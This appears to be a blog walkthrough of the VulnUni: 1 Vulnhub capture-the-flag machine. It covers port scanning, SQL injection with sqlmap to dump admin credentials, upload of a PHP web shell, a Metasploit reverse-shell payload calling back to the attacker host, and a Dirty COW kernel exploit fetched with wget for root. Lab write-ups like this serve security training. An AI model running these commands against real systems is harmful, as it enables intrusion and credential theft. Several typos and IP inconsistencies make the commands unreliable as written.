VulnUni: 1.0.1 Walkthrough Vulnhub

VulnUni: 1 Walkthrough Vulnhub CTF | VulnUni: 1 Walkthrough Vulnhub CTF

Today, we’re sharing another Vulnhub CTF Challenge Walkthrough VulnUni: 1 created by emaragkos and this machine goal is finding two flag user and root flags.

You can download here

Description

This boot2root machine is realistic without any CTF elements and pretty straight forward. Goal: Hack your University and get root access to the server.

Network Scanning

First, we scanning our local network and find our target IP address

netdiscover
VulnUni: 1.0.1 Walkthrough Vulnhub

our next step is scanning target open ports and running services using Nmap.

nmap -A -p- 192.168.1.9
VulnUni: 1.0.1 Walkthrough Vulnhub

We see the nmap scanning output our target port 80 HTTP Apache server is running.

Enumeration

I open the target IP address on browser and we see a cybersecurity templet After enumeration the website dirb and go-buster and Another scanning tool I didn’t find anything useful

so I move on our next step I open the burp suite and intercept the home page request using right-click send the request scanner

http://192.168.1.19
VulnUni: 1.0.1 Walkthrough Vulnhub

here we see another burp New scan window is open click the Crawl and audit uncheck the ignore protocols in URLs and click ok button

VulnUni: 1.0.1 Walkthrough Vulnhub
VulnUni: 1.0.1 Walkthrough Vulnhub

burp suite scanning is complete we see lots of URLs I open the E-Class URL and we see a login form

http://192.168.1.9/vulnuni-eclass/
VulnUni: 1.0.1 Walkthrough Vulnhub

I log in with default username and password but we see a Document Expired error and our URL is redirected vulnumi. local so we should add to our /etc/hosts file.

192.168.1.9 vulnuni.local
VulnUni: 1.0.1 Walkthrough Vulnhub

The web application About page we see the version is 1.7.2 is outdated I search exploit on exploit-db there I found an exploit GUnet OpenEclass E-learning platform 1.7.3 – ‘uname’ SQL Injection

Exploit-DB exploit link

according to exploit again intercept the login page request Save intercepted request as a file (Right click -> Copy to file -> Save as any file name in my case file name is sql-request-vulni-eclass

POST /vulnuni-eclass/ HTTP/1.1
Host: vulnuni.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
DNT: 1
Connection: close
Referer: http://vulnuni.local/vulnuni-eclass/
Cookie: PHPSESSID=buoaer6ppiu98scnen791mqo91
Upgrade-Insecure-Requests: 1
uname=&pass=&submit=Enter

Load the file to SQLMap with the use of -r parameter sqlmap -r sql-request-vulni-eclass ( –dbs dump all database name ) and ( –batch Never ask for user input, use the default behavior )

sqlmap -r sql-request-vulni-eclass --dbs --batch
VulnUni: 1.0.1 Walkthrough Vulnhub

We found 5 database and our next step is finding username and passwrod using this command

sqlmap -r sql-request-vulni-eclass -D eclass -T user -C password --dump --batch

we found another exploit from exploit-db Authenticated – Requires admin account) – Upload PHP shell we have now valid administrator username password. more about this exploit

According to exploit You have to log in to the platform as an administrator or user with admin rights.

  • admin
  • ilikecats89
http://vulnuni.local/vulnuni-eclass
VulnUni: 1.0.1  Vulnhub Writeup

Navigate this URL upload you shell vulnuni.local/modules/course_info/restore_course.php

http://vulnuni.loca/vulnuni-eclass/modules/course_info/restore_course.php
VulnUni: 1.0.1  Vulnhub Writeup

Upload your .php shell compressed in a .zip file I create a command injection php backdoor and compressed a zip file upload.zip

cat >command.php
<?php systme($_GET["cmd"]); ?>
zip upload.zip command.php
VulnUni: 1.0.1  Vulnhub Writeup
Calling Our Shell

Navigate this URL we call our shell using parameter id we see our current user-id

http://vulnuni.loca/vulnuni-eclass/courses/tmpUnzipping/command.php?cmd=id
VulnUni: 1.0.1  Vulnhub Writeup

Post-Explotation

Without wasting our time I open msfconsole web_delivery exploit and set target php reverse shell

msfdb run
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.18
set srvport 80
run

copy the following command and paste cmd= your command

http://vulnuni.loca/vulnuni-eclass/courses/tmpUnzipping/command.php?cmd= paste your link

and our meterpreter session is open now run these command for proper shell

sessions 1
shell
python -c 'import pty;pty.spawn("/bin/bash")'
id
VulnUni: 1.0.1  walkthrough Vulnhub
First Flag

user home directory we found our first flag

cd /home
ls
cd vulnuni
ls
cat flag.txt

Privilege Escalation

uname -r command to we see the kernel version of target machine I search google the version of the kernel and I found a kernel exploit from Dirtycow

uname -r

I download the exploit our local machine and start our python server on port 80 and move on target /tmp directory using wget command to download the exploit target machine

cd /tmp
wget http://192.168.1.18/exploit.c

Compiling our exploit c language file to executable binary file using this command and adding permission r+w+x

gcc -Wall -o run exploit.c -ldl -lpthread
chmod 777 run

After adding permission I run the exploit and I got a root shell

./run
cd /root
ls
Second Flag
cat flag.txt
id
MuzzyBox 1 link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *